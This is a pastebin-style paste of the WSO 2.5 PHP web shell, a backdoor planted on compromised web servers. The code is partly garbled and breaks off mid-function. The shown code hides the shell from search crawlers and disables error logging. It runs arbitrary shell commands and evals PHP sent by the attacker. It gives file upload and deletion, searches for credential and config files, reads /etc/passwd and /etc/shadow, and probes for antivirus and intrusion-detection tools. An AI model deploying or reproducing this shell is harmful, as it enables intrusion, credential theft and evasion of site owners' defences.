· 6 years ago · Oct 27, 2019, 04:40 PM
1<?php ?> < ? php
2$auth_pass = "a23943a5edc56f796ea1aeeb57f78dd4";
3$color = "#df5";
4$default_action = 'FilesMan';
5$default_use_ajax = true;
6$default_charset = 'Windows-1251';
7if (!empty($_SERVER['HTTP_USER_AGENT'])) {
8 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
9 if (preg_match('/'.implode('|', $userAgents).
10 '/i', $_SERVER['HTTP_USER_AGENT'])) {
11 header('HTTP/1.0 404 Not Found');
12 exit;
13 }
14}
15@ini_set('error_log', NULL);
16@ini_set('log_errors', 0);
17@ini_set('max_execution_time', 0);
18@set_time_limit(0);
19@set_magic_quotes_runtime(0);
20@define('WSO_VERSION', '2.5');
21if (get_magic_quotes_gpc()) {
22 function WSOstripslashes($array) {
23 return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
24 }
25 $_POST = WSOstripslashes($_POST);
26 $_COOKIE = WSOstripslashes($_COOKIE);
27}
28
29function wsoLogin() {
30 die("<pre align=center><form method=post> <input type=password name=pass><input type=submit value='>>'></form></pre>");
31}
32
33function WSOsetcookie($k, $v) {
34 $_COOKIE[$k] = $v;
35 setcookie($k, $v);
36}
37if (!empty($auth_pass)) {
38 if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
39 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin();
40}
41if (strtolower(substr(PHP_OS, 0, 3)) == "win") $os = 'win';
42else $os = 'nix';
43$safe_mode = @ini_get('safe_mode');
44if (!$safe_mode) error_reporting(0);
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
47if (isset($_POST['c'])) @chdir($_POST['c']);
48$cwd = @getcwd();
49if ($os == 'win') {
50 $home_cwd = str_replace("\", " / ", $home_cwd);
51 $cwd = str_replace("\", " / ", $cwd);
52 }
53 if ($cwd[strlen($cwd) - 1] != '/')
54 $cwd. = '/';
55
56 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']).
57 'ajax']))
58 $_COOKIE[md5($_SERVER['HTTP_HOST']).
59 'ajax'] = (bool) $default_use_ajax;
60
61 if ($os == 'win')
62 $aliases = array(
63 "ListDirectory" => "dir",
64 "Findindex . phpincurrentdir" => "dir / s / w / bindex . php",
65 "Find * config * . phpincurrentdir" => "dir / s / w / b * config * . php",
66 "Showactiveconnections" => "netstat - an",
67 "Showrunningservices" => "netstart",
68 "Useraccounts" => "netuser",
69 "Showcomputers" => "netview",
70 "ARPTable" => "arp - a",
71 "IPConfiguration" => "ipconfig / all"
72 );
73 else
74 $aliases = array(
75 "Listdir" => "ls - lha",
76 "listfileattributesonaLinuxsecondextendedfilesystem" => "lsattr - va",
77 "showopenedports" => "netstat - an | grep - ilisten",
78 "processstatus" => "psaux",
79 "Find" => "",
80 "findallsuidfiles" => "find / -typef - perm - 04000 - ls",
81 "findsuidfilesincurrentdir" => "find . -typef - perm - 04000 - ls",
82 "findallsgidfiles" => "find / -typef - perm - 02000 - ls",
83 "findsgidfilesincurrentdir" => "find . -typef - perm - 02000 - ls",
84 "findconfig . inc . phpfiles" => "find / -typef - nameconfig . inc . php",
85 "findconfig * files" => "find / -typef - name\"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
86
87 function wsoHeader() {
88 if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
89 global $color;
90 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=".$_POST['charset'].
91 "'><title>".$_SERVER['HTTP_HOST'].
92 " - WSO ".WSO_VERSION.
93 "</title> < style >
94 body {
95 background - color: #444;color:# e1e1e1;
96 }
97 body, td, th {
98 font: 9 pt Lucida,
99 Verdana;margin: 0;vertical - align: top;color: #e1e1e1;
100 }
101 table.info {
102 color: #fff;background - color: #222; }
103span,h1,a{ color: $color !important; }
104span{ font-weight: bolder; }
105h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:# 222;margin: 0 px;
106 }
107 div.content {
108 padding: 5 px;margin - left: 5 px;background - color: #333; }
109a{ text-decoration:none; }
110a:hover{ text-decoration:underline; }
111.ml1{ border:1px solid # 444;padding: 5 px;margin: 0;overflow: auto;
112 }
113 .bigarea {
114 width: 100 % ;height: 300 px;
115 }
116 input, textarea, select {
117 margin: 0;color: #fff;background - color: #555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
118form{ margin:0px; }
119# toolsTbl {
120 text - align: center;
121 }
122 .toolsInp {
123 width: 300 px
124 }
125 .main th {
126 text - align: left;
127 background - color: #5e5e5e;}
128.main tr:hover{background-color:# 5e5 e5e
129 }
130 .l1 {
131 background - color: #444}
132.l2{background-color:# 333
133 }
134 pre {
135 font - family: Courier, Monospace;
136 } < /style> < script >
137 var c_ = '" . htmlspecialchars($GLOBALS['
138 cwd ']) . "';
139 var a_ = '" . htmlspecialchars(@$_POST['
140 a ']) . "'
141 var charset_ = '" . htmlspecialchars(@$_POST['
142 charset ']) . "';
143 var p1_ = '" . ((strpos(@$_POST['
144 p1 '], "
145 ") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "
146 ';
147 var p2_ = '" . ((strpos(@$_POST['
148 p2 '], "
149 ") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "
150 ';
151 var p3_ = '" . ((strpos(@$_POST['
152 p3 '], "
153 ") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "
154 ';
155 var d = document;
156
157 functionset(a, c, p1, p2, p3, charset) {
158 if (a != null) d.mf.a.value = a;
159 else d.mf.a.value = a_;
160 if (c != null) d.mf.c.value = c;
161 else d.mf.c.value = c_;
162 if (p1 != null) d.mf.p1.value = p1;
163 else d.mf.p1.value = p1_;
164 if (p2 != null) d.mf.p2.value = p2;
165 else d.mf.p2.value = p2_;
166 if (p3 != null) d.mf.p3.value = p3;
167 else d.mf.p3.value = p3_;
168 if (charset != null) d.mf.charset.value = charset;
169 else d.mf.charset.value = charset_;
170 }
171
172 function g(a, c, p1, p2, p3, charset) {
173 set(a, c, p1, p2, p3, charset);
174 d.mf.submit();
175 }
176
177 function a(a, c, p1, p2, p3, charset) {
178 set(a, c, p1, p2, p3, charset);
179 var params = 'ajax=true';
180 for (i = 0; i < d.mf.elements.length; i++)
181 params += '&' + d.mf.elements[i].name + '=' + encodeURIComponent(d.mf.elements[i].value);
182 sr('" . addslashes($_SERVER['
183 REQUEST_URI ']) . "', params);
184 }
185
186 function sr(url, params) {
187 if (window.XMLHttpRequest)
188 req = new XMLHttpRequest();
189 else if (window.ActiveXObject)
190 req = new ActiveXObject('Microsoft.XMLHTTP');
191 if (req) {
192 req.onreadystatechange = processReqChange;
193 req.open('POST', url, true);
194 req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
195 req.send(params);
196 }
197 }
198
199 function processReqChange() {
200 if ((req.readyState == 4))
201 if (req.status == 200) {
202 var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
203 var arr = reg.exec(req.responseText); eval(arr[2].substr(0, arr[1]));
204 } else alert('Request error!');
205 } < /script> < head > < body > < div style = 'position:absolute;width:100%;background-color:#444;top:0;left:0;' >
206 < form method = post name = mf style = 'display:none;' >
207 < input type = hidden name = a >
208 < input type = hidden name = c >
209 < input type = hidden name = p1 >
210 < input type = hidden name = p2 >
211 < input type = hidden name = p3 >
212 < input type = hidden name = charset >
213 < /form>";
214 $freeSpace = @diskfreespace($GLOBALS['cwd']);
215 $totalSpace = @disk_total_space($GLOBALS['cwd']);
216 $totalSpace = $totalSpace ? $totalSpace : 1;
217 $release = @php_uname('r');
218 $kernel = @php_uname('s');
219 $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
220 if (strpos('Linux', $kernel) !== false) $explink. = urlencode('Linux Kernel '.substr($release, 0, 6));
221 else $explink. = urlencode($kernel.
222 ' '.substr($release, 0, 3));
223 if (!function_exists('posix_getegid')) {
224 $user = @get_current_user();
225 $uid = @getmyuid();
226 $gid = @getmygid();
227 $group = "?";
228 } else {
229 $uid = @posix_getpwuid(posix_geteuid());
230 $gid = @posix_getgrgid(posix_getegid());
231 $user = $uid['name'];
232 $uid = $uid['uid'];
233 $group = $gid['name'];
234 $gid = $gid['gid'];
235 }
236 $cwd_links = '';
237 $path = explode("/", $GLOBALS['cwd']);
238 $n = count($path);
239 for ($i = 0; $i < $n - 1; $i++) {
240 $cwd_links. = "<a href='#' onclick='g(\"FilesMan\",\"";
241 for ($j = 0; $j <= $i; $j++) $cwd_links. = $path[$j].
242 '/';
243 $cwd_links. = "\")'>".$path[$i].
244 "/</a>";
245 }
246 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
247 $opt_charsets = '';
248 foreach($charsets as $item) $opt_charsets. = '<option value="'.$item.
249 '" '.($_POST['charset'] == $item ? 'selected' : '').
250 '>'.$item.
251 '</option>';
252 $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
253 if (!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
254 $m['Self remove'] = 'SelfRemove';
255 $menu = '';
256 foreach($m as $k => $v) $menu. = '<th width="'.(int)(100 / count($m)).
257 '%">[ <a href="#" onclick="g(\''.$v.
258 '\',null,\'\',\'\',\'\')">'.$k.
259 '</a> ]</th>';
260 $drives = "";
261 if ($GLOBALS['os'] == 'win') {
262 foreach(range('c', 'z') as $drive) if (is_dir($drive.
263 ':\'))
264 $drives. = ' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.
265 ':/\')" > ['.$drive.
266 '] < / a > ';
267 }
268 echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd:
269 ' . ($GLOBALS['
270 os '] == '
271 win '?' < br > Drives:
272 ':'
273 ') . ' < / span > < /
274 td > '
275 .
276 ' < td > < nobr > '.substr(@php_uname(), 0, 120).
277 ' < ahref = "'.$explink.
278 '"target = _blank > [exploit - db . com] < / a > < / nobr > < br > '.$uid.
279 '('.$user.
280 ') < span > Group: < / span > '.$gid.
281 '('.$group.
282 ') < br > '.@phpversion().
283 ' < span > Safemode: < / span > '.($GLOBALS['safe_mode'] ? ' < fontcolor = red > ON < / font > ' : ' < fontcolor = green > < b > OFF < / b > < / font > ')
284 .
285 ' < ahref = # onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').
286 '<br>'.wsoViewSize($totalSpace).
287 ' <span>Free:</span> '.wsoViewSize($freeSpace).
288 ' ('.(int)($freeSpace / $totalSpace * 100).
289 '%)<br>'.$cwd_links.
290 ' '.wsoPermsColor($GLOBALS['cwd']).
291 ' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].
292 '\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.
293 '</td>'
294 .
295 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.
296 '</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"].
297 '<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].
298 '</nobr></td></tr></table>'.
299 '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.
300 '</tr></table><div style="margin:5">';
301 }
302
303 function wsoFooter() {
304 $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
305 echo " < /div> < table class = info id = toolsTbl cellpadding = 3 cellspacing = 0 width = 100 % style = 'border-top:2px solid #333;border-bottom:2px solid #333;' >
306 < tr >
307 < td > < form onsubmit = 'g(null,this.c.value,\"\");return false;' > < span > Change dir: < /span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form > < /td> < td > < form onsubmit = \"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> < /tr><tr> < td > < form onsubmit = \"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> < td > < form onsubmit = \"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> < /tr><tr> < td > < form onsubmit = \"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> < td > < form method = 'post'
308 ENCTYPE = 'multipart/form-data' >
309 < input type = hidden name = a value = 'FilesMAn' >
310 < input type = hidden name = c value = '" . $GLOBALS['
311 cwd '] . "' >
312 < input type = hidden name = p1 value = 'uploadFile' >
313 < input type = hidden name = charset value = '" . (isset($_POST['
314 charset ']) ? $_POST['
315 charset '] : '
316 ') . "' >
317 < span > Upload file: < /span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form > < br > < /td> < /tr></table > < /div></body > < /html>";
318 }
319 if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) {
320 function posix_getpwuid($p) {
321 return false;
322 }
323 }
324 if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) {
325 function posix_getgrgid($p) {
326 return false;
327 }
328 }
329
330 function wsoEx($in) {
331 $out = '';
332 if (function_exists('exec')) {
333 @exec($in, $out);
334 $out = @join("
335 ", $out);
336 }
337 elseif(function_exists('passthru')) {
338 ob_start();
339 @passthru($in);
340 $out = ob_get_clean();
341 }
342 elseif(function_exists('system')) {
343 ob_start();
344 @system($in);
345 $out = ob_get_clean();
346 }
347 elseif(function_exists('shell_exec')) {
348 $out = shell_exec($in);
349 }
350 elseif(is_resource($f = @popen($in, "r"))) {
351 $out = "";
352 while (!@feof($f)) $out. = fread($f, 1024);
353 pclose($f);
354 }
355 return $out;
356 }
357
358 function wsoViewSize($s) {
359 if (is_int($s)) $s = sprintf("%u", $s);
360 if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824).
361 ' GB';
362 elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576).
363 ' MB';
364 elseif($s >= 1024) return sprintf('%1.2f', $s / 1024).
365 ' KB';
366 else return $s.
367 ' B';
368 }
369
370 function wsoPerms($p) {
371 if (($p & 0xC000) == 0xC000) $i = 's';
372 elseif(($p & 0xA000) == 0xA000) $i = 'l';
373 elseif(($p & 0x8000) == 0x8000) $i = '-';
374 elseif(($p & 0x6000) == 0x6000) $i = 'b';
375 elseif(($p & 0x4000) == 0x4000) $i = 'd';
376 elseif(($p & 0x2000) == 0x2000) $i = 'c';
377 elseif(($p & 0x1000) == 0x1000) $i = 'p';
378 else $i = 'u';
379 $i. = (($p & 0x0100) ? 'r' : '-');
380 $i. = (($p & 0x0080) ? 'w' : '-');
381 $i. = (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
382 $i. = (($p & 0x0020) ? 'r' : '-');
383 $i. = (($p & 0x0010) ? 'w' : '-');
384 $i. = (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
385 $i. = (($p & 0x0004) ? 'r' : '-');
386 $i. = (($p & 0x0002) ? 'w' : '-');
387 $i. = (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
388 return $i;
389 }
390
391 function wsoPermsColor($f) {
392 if (!@is_readable($f)) return '<font color=#FF0000>'.wsoPerms(@fileperms($f)).
393 '</font>';
394 elseif(!@is_writable($f)) return '<font color=white>'.wsoPerms(@fileperms($f)).
395 '</font>';
396 else return '<font color=#25ff00>'.wsoPerms(@fileperms($f)).
397 '</font>';
398 }
399
400 function wsoScandir($dir) {
401 if (function_exists("scandir")) {
402 return scandir($dir);
403 } else {
404 $dh = opendir($dir);
405 while (false !== ($filename = readdir($dh))) $files[] = $filename;
406 return $files;
407 }
408 }
409
410 function wsoWhich($p) {
411 $path = wsoEx('which '.$p);
412 if (!empty($path)) return $path;
413 return false;
414 }
415
416 function actionSecInfo() {
417 wsoHeader();
418 echo '<h1>Server security information</h1><div class=content>';
419
420 function wsoSecParam($n, $v) {
421 $v = trim($v);
422 if ($v) {
423 echo '<span>'.$n.
424 ': </span>';
425 if (strpos($v, "
426 ") === false) echo $v . '<br>';
427 else echo '<pre class=ml1>'.$v.
428 '</pre>';
429 }
430 }
431 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
432 if (function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
433 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
434 wsoSecParam('Open base dir', @ini_get('open_basedir'));
435 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
436 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
437 wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
438 $temp = array();
439 if (function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().
440 ")";
441 if (function_exists('mssql_connect')) $temp[] = "MSSQL";
442 if (function_exists('pg_connect')) $temp[] = "PostgreSQL";
443 if (function_exists('oci_connect')) $temp[] = "Oracle";
444 wsoSecParam('Supported databases', implode(', ', $temp));
445 echo '<br>';
446 if ($GLOBALS['os'] == 'nix') {
447 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
448 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
449 wsoSecParam('OS version', @file_get_contents('/proc/version'));
450 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
451 if (!$GLOBALS['safe_mode']) {
452 $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
453 $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
454 $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
455 echo '<br>';
456 $temp = array();
457 foreach($userful as $item) if (wsoWhich($item)) $temp[] = $item;
458 wsoSecParam('Userful', implode(', ', $temp));
459 $temp = array();
460 foreach($danger as $item) if (wsoWhich($item)) $temp[] = $item;
461 wsoSecParam('Danger', implode(', ', $temp));
462 $temp = array();
463 foreach($downloaders as $item) if (wsoWhich($item)) $temp[] = $item;
464 wsoSecParam('Downloaders', implode(', ', $temp));
465 echo '<br/>';
466 wsoSecParam('HDD space', wsoEx('df -h'));
467 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
468 echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
469 if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
470 $temp = "";
471 for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++) {
472 $uid = @posix_getpwuid($_POST['p2']);
473 if ($uid) $temp. = join(':', $uid).
474 "
475 ";
476 }
477 echo '<br/>';
478 wsoSecParam('Users', $temp);
479 }
480 }
481 } else {
482 wsoSecParam('OS Version', wsoEx('ver'));
483 wsoSecParam('Account Settings', wsoEx('net accounts'));
484 wsoSecParam('User Accounts', wsoEx('net user'));
485 }
486 echo '</div>';
487 wsoFooter();
488 }
489
490 function actionPhp() {
491 if (isset($_POST['ajax'])) {
492 WSOsetcookie(md5($_SERVER['HTTP_HOST']).
493 'ajax', true);
494 ob_start();
495 eval($_POST['p1']);
496 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()), "
497
498 \
499 ' ") . "';
500 ";
501 echo strlen($temp), "
502 ", $temp;
503 exit;
504 }
505 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).
506 'ajax', 0);
507 wsoHeader();
508 if (isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
509 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
510 ob_start();
511 phpinfo();
512 $tmp = ob_get_clean();
513 $tmp = preg_replace(array('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU', ), array('', '.e, .v, .h, .h th {$1}', ''), $tmp);
514 echo str_replace('<h1', '<h2', $tmp).
515 '</div><br>';
516 }
517 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '').
518 '</textarea><input type=submit value=Eval style="margin-top:5px">';
519 echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).
520 'ajax'] ? 'checked' : '').
521 '> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1']) ? 'display:none;' : '').
522 'margin-top:5px;" class=ml1>';
523 if (!empty($_POST['p1'])) {
524 ob_start();
525 eval($_POST['p1']);
526 echo htmlspecialchars(ob_get_clean());
527 }
528 echo '</pre></div>';
529 wsoFooter();
530 }
531
532 function actionFilesMan() {
533 if (!empty($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
534 if (!empty($_POST['p1'])) {
535 switch ($_POST['p1']) {
536 case 'uploadFile':
537 if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!";
538 break;
539 case 'mkdir':
540 if (!@mkdir($_POST['p2'])) echo "Can't create new dir";
541 break;
542 case 'delete':
543 function deleteDir($path) {
544 $path = (substr($path, -1) == '/') ? $path : $path.
545 '/';
546 $dh = opendir($path);
547 while (($item = readdir($dh)) !== false) {
548 $item = $path.$item;
549 if ((basename($item) == "..") || (basename($item) == ".")) continue;
550 $type = filetype($item);
551 if ($type == "dir") deleteDir($item);
552 else @unlink($item);
553 }
554 closedir($dh);
555 @rmdir($path);
556 }
557 if (is_array(@$_POST['f'])) foreach($_POST['f'] as $f) {
558 if ($f == '..') continue;
559 $f = urldecode($f);
560 if (is_dir($f)) deleteDir($f);
561 else @unlink($f);
562 }
563 break;
564 case 'paste':
565 if ($_COOKIE['act'] == 'copy') {
566 function copy_paste($c, $s, $d) {
567 if (is_dir($c.$s)) {
568 mkdir($d.$s);
569 $h = @opendir($c.$s);
570 while (($f = @readdir($h)) !== false)
571 if (($f != ".") and($f != "..")) copy_paste($c.$s.
572 '/', $f, $d.$s.
573 '/');
574 }
575 elseif(is_file($c.$s)) @copy($c.$s, $d.$s);
576 }
577 foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
578 }
579 elseif($_COOKIE['act'] == 'move') {
580 function move_paste($c, $s, $d) {
581 if (is_dir($c.$s)) {
582 mkdir($d.$s);
583 $h = @opendir($c.$s);
584 while (($f = @readdir($h)) !== false)
585 if (($f != ".") and($f != "..")) copy_paste($c.$s.
586 '/', $f, $d.$s.
587 '/');
588 }
589 elseif(@is_file($c.$s)) @copy($c.$s, $d.$s);
590 }
591 foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
592 }
593 elseif($_COOKIE['act'] == 'zip') {
594 if (class_exists('ZipArchive')) {
595 $zip = new ZipArchive();
596 if ($zip - > open($_POST['p2'], 1)) {
597 chdir($_COOKIE['c']);
598 foreach($_COOKIE['f'] as $f) {
599 if ($f == '..') continue;
600 if (@is_file($_COOKIE['c'].$f)) $zip - > addFile($_COOKIE['c'].$f, $f);
601 elseif(@is_dir($_COOKIE['c'].$f)) {
602 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.
603 '/', FilesystemIterator::SKIP_DOTS));
604 foreach($iterator as $key => $value) {
605 $zip - > addFile(realpath($key), $key);
606 }
607 }
608 }
609 chdir($GLOBALS['cwd']);
610 $zip - > close();
611 }
612 }
613 }
614 elseif($_COOKIE['act'] == 'unzip') {
615 if (class_exists('ZipArchive')) {
616 $zip = new ZipArchive();
617 foreach($_COOKIE['f'] as $f) {
618 if ($zip - > open($_COOKIE['c'].$f)) {
619 $zip - > extractTo($GLOBALS['cwd']);
620 $zip - > close();
621 }
622 }
623 }
624 }
625 elseif($_COOKIE['act'] == 'tar') {
626 chdir($_COOKIE['c']);
627 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
628 wsoEx('tar cfzv '.escapeshellarg($_POST['p2']).
629 ' '.implode(' ', $_COOKIE['f']));
630 chdir($GLOBALS['cwd']);
631 }
632 unset($_COOKIE['f']);
633 setcookie('f', '', time() - 3600);
634 break;
635 default:
636 if (!empty($_POST['p1'])) {
637 WSOsetcookie('act', $_POST['p1']);
638 WSOsetcookie('f', serialize(@$_POST['f']));
639 WSOsetcookie('c', @$_POST['c']);
640 }
641 break;
642 }
643 }
644 wsoHeader();
645 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
646 $dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
647 if ($dirContent === false) {
648 echo 'Can\'t open this folder!';
649 wsoFooter();
650 return;
651 }
652 global $sort;
653 $sort = array('name', 1);
654 if (!empty($_POST['p1'])) {
655 if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int) $match[2]);
656 }
657 echo "<script>
658
659 function sa() {
660 for (i = 0; i < d.files.elements.length; i++)
661 if (d.files.elements[i].type == 'checkbox')
662 d.files.elements[i].checked = d.files.elements[0].checked;
663 } < /script> < table width = '100%'
664 class = 'main'
665 cellspacing = '0'
666 cellpadding = '2' >
667 < form name = files method = post > < tr > < th width = '13px' > < input type = checkbox onclick = 'sa()'
668 class = chkbx > < /th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a > < /th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a > < /th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a > < /th><th>Owner/Group < /th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a > < /th><th>Actions</th > < /tr>";
669 $dirs = $files = array();
670 $n = count($dirContent);
671 for ($i = 0; $i < $n; $i++) {
672 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
673 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
